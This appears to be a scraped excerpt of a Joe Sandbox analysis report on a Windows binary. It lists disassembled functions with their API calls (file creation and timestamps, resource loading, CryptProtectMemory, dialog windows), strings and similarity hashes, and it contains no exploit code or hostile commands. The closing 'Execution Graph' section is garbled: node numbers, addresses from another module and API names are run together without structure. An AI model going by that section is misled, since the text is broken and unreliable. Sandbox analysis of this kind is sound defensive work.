• Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
• Instruction Fuzzy Hash: C3A148719003869FEF21DFA8C891BAEBBE5EF15354F2841ADE4959B281D238DD41C770
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D77F55,?,?,?), ref: 00D79FD0
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D77F55,?,?), ref: 00D7A014
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D77F55,?,?,?,?,?,?,?,?), ref: 00D7A095
• CloseHandle.KERNEL32(?,?,00000000,?,00D77F55,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7A09C
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 913418c87a52fd6748226b1cd6335ccc16c6dea4d6ec4f3c912efcfe93c64d6d
• Instruction ID: f0245fbda7056a0cb7f8dd5763db568959e8da3e11cce931b261edb8a7aff0ea
• Opcode Fuzzy Hash: 913418c87a52fd6748226b1cd6335ccc16c6dea4d6ec4f3c912efcfe93c64d6d
• Instruction Fuzzy Hash: 77419E31248381AAD731DF28DC55BAEFBE8AF85700F08891DF5E8D31C1E6649A489773
APIs
• LoadBitmapW.USER32(00000065), ref: 00D89A86
• GetObjectW.GDI32(00000000,00000018,?), ref: 00D89AA7
• DeleteObject.GDI32(00000000), ref: 00D89ACF
• DeleteObject.GDI32(00000000), ref: 00D89AEE
  • Part of subcall function 00D88BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00D89AC8,00000066), ref: 00D88BE1
  • Part of subcall function 00D88BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00D89AC8,00000066), ref: 00D88BF9
  • Part of subcall function 00D88BD0: LoadResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C0C
  • Part of subcall function 00D88BD0: LockResource.KERNEL32(00000000,?,?,00D89AC8,00000066), ref: 00D88C17
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
• API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
• String ID:
• API String ID: 142272564-0
• Opcode ID: c775fa4712db0e575c5fd6de54714a3b10b4ea20ff217d14cc8727d5bbadae5c
• Instruction ID: 26ea40155f50b7bf52aeccd96a87991a68daf77ae0dfa06c7969e506a0125b10
• Opcode Fuzzy Hash: c775fa4712db0e575c5fd6de54714a3b10b4ea20ff217d14cc8727d5bbadae5c
• Instruction Fuzzy Hash: 1A01F23264031537D71177789C42EBFB6AEEF86B61F4C0111B940E7291DE618C01A3B1
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 00D91020
  • Part of subcall function 00D91658: ___AdjustPointer.LIBCMT ref: 00D916A2
• _UnwindNestedFrames.LIBCMT ref: 00D91037
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00D91049
• CallCatchBlock.LIBVCRUNTIME ref: 00D9106D
Memory Dump Source
• Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 2633735394-0
                                                                                      • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction ID: 89dcd15d0b38bf27c9a09276813b889bc97abbd3b467b116cc91b0fd860a22eb
                                                                                      • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction Fuzzy Hash: 4201E936400149FBCF226F55CC41EDA3BBAEF58754F154515FA5865120D332E8A2EBB0
                                                                                      APIs
                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D90B66
                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D90B6B
                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D90B70
                                                                                        • Part of subcall function 00D91C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D91C1F
                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D90B85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                      • String ID:
                                                                                      • API String ID: 1761009282-0
                                                                                      • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction ID: aad7fc89738d8d3cc9e19597470ff418d0dcb027d636a09008554d5ebfaedf05
                                                                                      • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction Fuzzy Hash: 93C0486C1842439C1F203EB076021AE4B908C62BDDB8451C9FC9A1B823AA16880A6036
                                                                                      APIs
                                                                                        • Part of subcall function 00D88BA5: GetDC.USER32(00000000), ref: 00D88BA9
                                                                                        • Part of subcall function 00D88BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D88BB4
                                                                                        • Part of subcall function 00D88BA5: ReleaseDC.USER32(00000000,00000000), ref: 00D88BBF
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00D88D24
                                                                                        • Part of subcall function 00D88EEA: GetDC.USER32(00000000), ref: 00D88EF3
                                                                                        • Part of subcall function 00D88EEA: GetObjectW.GDI32(?,00000018,?), ref: 00D88F22
                                                                                        • Part of subcall function 00D88EEA: ReleaseDC.USER32(00000000,?), ref: 00D88FB6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                      • String ID: (
                                                                                      • API String ID: 1061551593-3887548279
                                                                                      • Opcode ID: a0e01736feba7b80946e34e73b310ca3b09a86d1aab4a80e883c0bb497d0bf4f
                                                                                      • Instruction ID: d28bb49a76ce76db8e0c8165454c68c3a0b6abc98f90d49a77305a9f52722b8f
                                                                                      • Opcode Fuzzy Hash: a0e01736feba7b80946e34e73b310ca3b09a86d1aab4a80e883c0bb497d0bf4f
                                                                                      • Instruction Fuzzy Hash: B361F4B1204305AFD210EF64C888E6BBBE9FF89704F50495DF599C7260DB71E909DB62
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _swprintf
                                                                                      • String ID: %ls$%s: %s
                                                                                      • API String ID: 589789837-2259941744
                                                                                      • Opcode ID: 956f9339b291e942d9e37c00713bdba0c98f94b794ea56bad526764c1c61fedd
                                                                                      • Instruction ID: c8641a3ec88de3db28e1c0a1bcb7e7e6d3188fac22c1a2fad77b6f9dab521fe5
                                                                                      • Opcode Fuzzy Hash: 956f9339b291e942d9e37c00713bdba0c98f94b794ea56bad526764c1c61fedd
                                                                                      • Instruction Fuzzy Hash: 8251863528C310FAEAE136948C4AF397E55EF45F00F60C50AB7DA644EAC5D1D85C673A
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7761E
                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D77799
                                                                                        • Part of subcall function 00D7A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A0D7
                                                                                        • Part of subcall function 00D7A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D79EF9,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D7A108
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$H_prologTime
                                                                                      • String ID: :
                                                                                      • API String ID: 1861295151-336475711
                                                                                      • Opcode ID: 9f51accf2e6c36a5ac3aed7f4371bc7c89ad168635f9254af3da8760cfaf1ac8
                                                                                      • Instruction ID: 70b925c9671ca2ba8c60c235799973cad0ebfedc925c9b8c045cbcba3d57fea5
                                                                                      • Opcode Fuzzy Hash: 9f51accf2e6c36a5ac3aed7f4371bc7c89ad168635f9254af3da8760cfaf1ac8
                                                                                      • Instruction Fuzzy Hash: 0241D371804258AADB34EB64DC55EEEB77CEF45300F4484AAB54DA2182FB709F85CB71
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: UNC$\\?\
                                                                                      • API String ID: 0-253988292
                                                                                      • Opcode ID: ad7c3d85ca4320714f2a79a1df3d386f5724b1b4c5f528b346b50d988b96a93f
                                                                                      • Instruction ID: 16e365e4d00620aee5f1c4c18ff0c983664bc4330f72fa03520e39df585da078
                                                                                      • Opcode Fuzzy Hash: ad7c3d85ca4320714f2a79a1df3d386f5724b1b4c5f528b346b50d988b96a93f
                                                                                      • Instruction Fuzzy Hash: B3414F35400259AACB21AF61DC41BEE7BA9EF053A0F54C567F95CA3142F770DA948AB0
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00D9CD1F,00000000,00000000,00000000,00000000,00000000,00D92C4E), ref: 00D9C98C
                                                                                      • GetLastError.KERNEL32(?,00D9CD1F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8,00000010,00D9B747,00000000,00DA8150,00000010), ref: 00D9C9B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: d0F
                                                                                      • API String ID: 442123175-1238022483
                                                                                      • Opcode ID: 0cb659e1cac2f5126330fdd50645cb453c0a93fa6c7885c454df37337c9e344c
                                                                                      • Instruction ID: 9c34c48e3f0757d292fa9f00eec56938e020b589dc55bb8a1f368b119633e654
                                                                                      • Opcode Fuzzy Hash: 0cb659e1cac2f5126330fdd50645cb453c0a93fa6c7885c454df37337c9e344c
                                                                                      • Instruction Fuzzy Hash: E7315E72A10219ABCB24CF5DCC80A9AB3F5FF48311F2485AAE54AD7350E730A981CF64
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00D9CD3F,00000000,00000000,00000000,00000000,00000000,00D92C4E), ref: 00D9C89E
                                                                                      • GetLastError.KERNEL32(?,00D9CD3F,00000000,00000000,00000000,00000000,00000000,00D92C4E,00000000,00D92C4E,00DA81D8,00000010,00D9B747,00000000,00DA8150,00000010), ref: 00D9C8C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: d0F
                                                                                      • API String ID: 442123175-1238022483
                                                                                      • Opcode ID: 685f7cda1de76945822f1b1775cbdeb802cf9463c06a5f068590e5fbfa291a31
                                                                                      • Instruction ID: 8d8620f8123f2a084b915e79cc81885f8cc044c63bdc2acc426da50fa0412ecf
                                                                                      • Opcode Fuzzy Hash: 685f7cda1de76945822f1b1775cbdeb802cf9463c06a5f068590e5fbfa291a31
                                                                                      • Instruction Fuzzy Hash: 15218D76A102199FCB15DF59C880BE9B7F9FB48301F1044AAE94AD7251D730AD85CB70
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Shell.Explorer$about:blank
                                                                                      • API String ID: 0-874089819
                                                                                      • Opcode ID: 62ddb23c51ac22fadc0b13fb54610922590ed1d369e67cdbcf602489c2a6f0fd
                                                                                      • Instruction ID: 14217f1329a416c25c878afd9560d69409d92a9fbaf7a23606a483b31dc4c69c
                                                                                      • Opcode Fuzzy Hash: 62ddb23c51ac22fadc0b13fb54610922590ed1d369e67cdbcf602489c2a6f0fd
                                                                                      • Instruction Fuzzy Hash: FA218B75210706AFD304BB60C890E2AB768FF85750B948229F1058B682CF71EC44DBB0
                                                                                      APIs
                                                                                        • Part of subcall function 00D7DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D7DED4
                                                                                        • Part of subcall function 00D7DEB5: GetProcAddress.KERNEL32(00DB1E58,CryptUnprotectMemory), ref: 00D7DEE4
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000080,?,00D7DF2E), ref: 00D7DFB5
                                                                                      Strings
                                                                                      • CryptUnprotectMemory failed, xrefs: 00D7DFAD
                                                                                      • CryptProtectMemory failed, xrefs: 00D7DF75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CurrentProcess
                                                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                      • API String ID: 2190909847-396321323
                                                                                      • Opcode ID: 54396d862c3e0d442f2784d7d4b7213d9621e86b4c53daeec7816dd3ea144eee
                                                                                      • Instruction ID: ee860f178c19eea5a057ad1177ea6b79a5945b6ceb93863f380f444745412cd1
                                                                                      • Opcode Fuzzy Hash: 54396d862c3e0d442f2784d7d4b7213d9621e86b4c53daeec7816dd3ea144eee
                                                                                      • Instruction Fuzzy Hash: 56112B713092569BDB119B39CC11A6EB7ABEF85754B08C019F80ADA291FB60EC0082B0
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D8DDAF
                                                                                      • ___raise_securityfailure.LIBCMT ref: 00D8DE96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                      • String ID: d0F
                                                                                      • API String ID: 3761405300-1238022483
                                                                                      • Opcode ID: 5c7c36a5c8fb28f059dbecaacc3f478c181b410ce2dccf9ffabe97407be73a15
                                                                                      • Instruction ID: ca474e4ebffe4ea5ebcbecf0813287d603fe9606dcb1b3695de2fc14f2bcb46c
                                                                                      • Opcode Fuzzy Hash: 5c7c36a5c8fb28f059dbecaacc3f478c181b410ce2dccf9ffabe97407be73a15
                                                                                      • Instruction Fuzzy Hash: 362112B550130B9ED704DF1DEE46F503BA4FB48318F11412AE909CBBA0E7B64980CF66
                                                                                      APIs
                                                                                        • Part of subcall function 00D7CED7: GetWindowRect.USER32(?,?), ref: 00D7CF0E
                                                                                        • Part of subcall function 00D7CED7: GetClientRect.USER32(?,?), ref: 00D7CF1A
                                                                                        • Part of subcall function 00D7CED7: GetWindowLongW.USER32(?,000000F0), ref: 00D7CFBB
                                                                                        • Part of subcall function 00D7CED7: GetWindowRect.USER32(?,?), ref: 00D7CFE8
                                                                                        • Part of subcall function 00D7CED7: GetWindowTextW.USER32(?,?,00000400), ref: 00D7D007
                                                                                      • GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                      • SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Text$ClientItemLong
                                                                                      • String ID: 0
                                                                                      • API String ID: 660763476-4108050209
                                                                                      • Opcode ID: 93c2a0b6b4665109c2dbcc0e03d69093e63e94a5d6e2849481ec236446e41bf1
                                                                                      • Instruction ID: 4758255fbcd3a864ecc9d94837beb94ba367343ad98bc1b2433b32d48781660a
                                                                                      • Opcode Fuzzy Hash: 93c2a0b6b4665109c2dbcc0e03d69093e63e94a5d6e2849481ec236446e41bf1
                                                                                      • Instruction Fuzzy Hash: 02F0A4B5540348ABDF160F688C0AAF93F599B05744F0CC214FE4C94591EB79D450EB34
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Free
                                                                                      • String ID: FlsFree$d0F
                                                                                      • API String ID: 3978063606-773397603
                                                                                      • Opcode ID: 14409069d1883c966663cbecc4bcb801403aa85165208f897ddf749635c0dbee
                                                                                      • Instruction ID: 9470b619e4b2967d98970a07136f864c3245d669bd25777d381a65289d920133
                                                                                      • Opcode Fuzzy Hash: 14409069d1883c966663cbecc4bcb801403aa85165208f897ddf749635c0dbee
                                                                                      • Instruction Fuzzy Hash: 8FE0E5B5B453187F8704BF659C0AA7EBB91DF46B10F140159F90697280DA715E00D6F9
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00D7FD0B,?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FACD
                                                                                      • GetLastError.KERNEL32(?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FAD9
                                                                                        • Part of subcall function 00D76DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D76DF1
                                                                                      Strings
                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D7FAE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                      • API String ID: 1091760877-2248577382
                                                                                      • Opcode ID: 388e49078b4b9ed039898d9d517c51925796654e8de3e3b65f6a9774976d61bd
                                                                                      • Instruction ID: 9f77932bfa73fa452b38e99fb001f80f0cbef0cc39de1ed4272125dab546e430
                                                                                      • Opcode Fuzzy Hash: 388e49078b4b9ed039898d9d517c51925796654e8de3e3b65f6a9774976d61bd
                                                                                      • Instruction Fuzzy Hash: 08D05E71618A312BD62137289C0AE6E3D049F13770F248716F13EA52E5EB614C5142B6

                                                                                      Execution Graph

                                                                                      Execution Coverage: 5.1%
                                                                                      Dynamic/Decrypted Code Coverage: 0%
                                                                                      Signature Coverage: 14.8%
                                                                                      Total number of Nodes: 2000
                                                                                      Total number of Limit Nodes: 112
GetProcAddress 94616 11029b2e SetLastError 94613->94616 94613->94636 94614->94608 94615 11029b97 SetLastError 94614->94615 94615->94608 94634 11029b36 std::ios_base::_Tidy 94616->94634 94619 11029b5b 94798 110278a0 GetProcAddress SetLastError 94619->94798 94620->94621 94625 11029881 SetLastError 94620->94625 94621->94600 94623->94600 94627 1102981c SetLastError 94623->94627 94625->94600 94626 11029b6a 94626->94609 94627->94600 94628->94600 94631 11029891 SetLastError 94628->94631 94629->94600 94630 110298d6 SetLastError 94629->94630 94630->94600 94631->94600 94632 110d1090 268 API calls 94633 11029a80 std::ios_base::_Tidy 94632->94633 94633->94632 94633->94634 94633->94636 94789 1110f4a0 94633->94789 94796 11027850 GetProcAddress SetLastError 94633->94796 94797 110278a0 GetProcAddress SetLastError 94634->94797 94635->94600 94637 11029918 SetLastError 94635->94637 94636->94608 94636->94609 94636->94613 94636->94633 94637->94638 94638->94600 94639 1102993d GetProcAddress 94638->94639 94639->94600 94640 1102996d SetLastError 94639->94640 94640->94641 94641->94600 94641->94642 94642->94600 94643 1102999a GetProcAddress 94642->94643 94643->94600 94644 110299d6 SetLastError 94643->94644 94644->94600 94645->94445 94647 1114229c 94646->94647 94648 1114229a 94646->94648 94649 1110f4a0 std::_Mutex::_Mutex 265 API calls 94647->94649 94648->94454 94650 111422c2 94649->94650 94651 111422cb _strncpy 94650->94651 94652 111422e9 94650->94652 94651->94454 94800 11029450 265 API calls 2 library calls 94652->94800 94655->94454 94801 110d05c0 94656->94801 94659 110d07e9 94806 11162be5 94659->94806 94660 110d07d2 94805 11029450 265 API calls 2 library calls 94660->94805 94664 110d07f2 94664->94428 94665->94430 94666->94433 94672 110d148c 94671->94672 94673 110d14a7 94672->94673 94674 110d1490 94672->94674 94687 110d0190 94673->94687 94716 11029450 265 API calls 2 library calls 94674->94716 94681 110d14de 94681->94573 94681->94574 94682 110d14c7 94717 11029450 265 API calls 2 library 
